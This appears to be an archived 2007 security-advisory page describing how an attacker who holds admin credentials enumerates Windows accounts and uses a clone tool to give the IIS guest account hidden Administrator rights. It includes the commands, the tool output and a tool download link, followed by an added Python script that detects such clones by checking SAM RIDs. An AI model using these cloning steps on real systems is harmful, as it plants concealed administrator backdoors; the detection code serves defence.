Remotely escalating an ordinary user's privileges - Vulnerability warning - Black Bar Safety Net

2007-03-19T00:00:00
ID MYHACK58:62200714617
Type myhack58
Reporter Anonymous
Modified 2007-03-19T00:00:00

Description

Steps:

1. Assume that a scanner has turned up a user on 192.168.0.1 named test, with the password test, who belongs to the Administrators group.

2. Use GetAccount (http://www.lsky.org/download/GetAccount.exe) to obtain information about the accounts that already exist on the system. A null session (empty connection) can of course also be used for this.

C:\>getaccount \\192.168.0.1 1

GetAccount Via SID, by netXeyes 2002/04/06

Connect To Host 192.168.0.1.... OK

Start Ememurate Account....

Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators

Disconnect The Host 192.168.0.1.... OK

3. Use SA.exe to clone Iusr_victim as Administrator.

C:\>ca \\192.168.0.1 test test iusr_victim password
Clone the Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.1.... OK
Get the SID of iusr_victim.... OK
Prepairing.... OK
Processing.... OK
Clean Up.... OK

C:\>

At this point iusr_victim has become a super user and has the same settings as Administrator (desktop, menus, etc.).

Viewing the result on 192.168.0.1 with the net command:

User name                    IUSR_VICTIM
Full Name                    Internet Guest Account
Comment                      Built-in account for anonymous access to Internet Information Services
User's comment               Built-in account for anonymous access to Internet Information Services
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2002/4/28 PM 10:31
Password expires             Never
Password changeable          2002/4/28 PM 10:31
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2002/4/28 PM 09:02

Logon hours allowed          All

Local Group Memberships      Guests
Global Group memberships     None
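
A defender-side check for the situation shown above, where net user still lists IUSR_VICTIM only under Guests. This Python example is added here and is not from the original page or the tool's author; it parses a .reg export of the SAM Users key and flags any account whose F value holds a RID other than the one in its key name. It assumes a cloned account appears as a SAM record carrying the Administrator's RID (500); the sample export and the RIDs 0x3E9 and 0x3EA are constructed.

```python
import re
import struct

RID_OFFSET = 0x30  # 32-bit little-endian RID field inside a SAM user's F value

def find_rid_mismatches(reg_text):
    """Return sorted (name, key_rid, stored_rid) for user keys whose F value
    holds a RID different from the RID in the key name."""
    text = re.sub(r"\\\r?\n\s*", "", reg_text)  # join "\"-continued hex lines
    names, stored, key = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            m = re.match(r"\[.*\\Users\\(.+)\]$", line)
            key = m.group(1) if m else None
        elif key and key.startswith("Names\\"):
            m = re.match(r"@=hex\(([0-9a-fA-F]+)\):", line)
            if m:  # the default value's *type* is the account's RID
                names[int(m.group(1), 16)] = key.split("\\", 1)[1]
        elif key and re.fullmatch(r"[0-9A-Fa-f]{8}", key) and line.startswith('"F"=hex:'):
            raw = bytes.fromhex(line.split(":", 1)[1].replace(",", ""))
            if len(raw) >= RID_OFFSET + 4:
                stored[int(key, 16)] = struct.unpack_from("<I", raw, RID_OFFSET)[0]
    return sorted((names.get(k, "?"), k, v) for k, v in stored.items() if k != v)

def sample_f_hex(rid):
    """Constructed 80-byte F value (zeros except the RID), wrapped like a .reg export."""
    raw = bytearray(80)
    struct.pack_into("<I", raw, RID_OFFSET, rid)
    h = [f"{b:02x}" for b in raw]
    return ",\\\n  ".join(",".join(h[i:i + 25]) for i in range(0, 80, 25))

# Constructed sample export; RIDs 0x3E9 and 0x3EA are made up for illustration.
USERS_KEY = r"[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
SAMPLE = "\n".join([
    "Windows Registry Editor Version 5.00", "",
    USERS_KEY + r"\000001F4]", '"F"=hex:' + sample_f_hex(0x1F4), "",
    USERS_KEY + r"\000003E9]", '"F"=hex:' + sample_f_hex(0x1F4), "",  # record carrying RID 500
    USERS_KEY + r"\000003EA]", '"F"=hex:' + sample_f_hex(0x3EA), "",
    USERS_KEY + r"\Names\Administrator]", "@=hex(1f4):", "",
    USERS_KEY + r"\Names\IUSR_VICTIM]", "@=hex(3e9):", "",
    USERS_KEY + r"\Names\zjf]", "@=hex(3ea):", "",
])

if __name__ == "__main__":
    for name, key_rid, rid in find_rid_mismatches(SAMPLE):
        print(f"{name}: key RID {key_rid} but F value holds RID {rid}")
```

The SAM key is readable only by SYSTEM by default, so run this against an export taken with that privilege or from an offline hive. Exports in the version 5.00 format are UTF-16 and must be decoded before the text is passed in.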